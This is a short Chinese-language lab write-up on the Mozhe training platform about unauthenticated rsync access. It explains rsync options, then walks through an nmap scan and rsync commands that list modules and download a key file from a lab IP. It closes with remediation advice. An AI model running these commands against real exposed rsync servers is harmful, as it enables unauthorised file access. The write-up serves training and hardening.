墨者-rsync未授权访问漏洞利用

Rsync是Linux下一款数据备份工具，支持通过rsync协议、ssh协议进行远程文件传输。常被用于在内网进行源代码的分发及同步更新，因此使用人群多为开发人员

优点：速度非常快，因为只同步文件当中不同的地方

Rsync默认端口：873

常用指令：

-v, --verbose 详细模式输出。
-q, --quiet 精简输出模式。
-c, --checksum 打开校验开关，强制对文件传输进行校验。
-a, --archive 归档模式，表示以递归方式传输文件，并保持所有文件属性，等于-rlptgoD。
-r, --recursive 对子目录以递归模式处理。
-R, --relative 使用相对路径信息。
-b, --backup 创建备份，也就是对于目的已经存在有同样的文件名时，将老的文件重新命名为~filename。可以使用--suffix选项来指定不同的备份文件前缀。
--backup-dir 将备份文件(如~filename)存放在在目录下。

复现：

 

1. 先用nmap -A  219.153.49.228 扫一下端口，发现扫不出端口 应该是873被过滤了 那么既然题目给了端口 ，就用题给端口

2.查看服务器目录，命令： rsync --port=端口号 ip::

 

 3.查看服务器目录下的文件。命令： rsync --port=端口号 ip::目录名

 

 这个时候可以看见有个key.php

那么我们下一步就是把这个文件同步到我们本地

4.命令：

rsync --port=48946 219.153.49.228::volume/key_12234179122319.php /root

 

 

 

 

 

详细命令：https://man.linuxde.net/rsync

修复方案：1、禁止外网访问 rsync服务；
                  2、rsync服务添加认证功能；
                  3、以低权限运行 rsync 服务；
                  6、设置防火墙策略；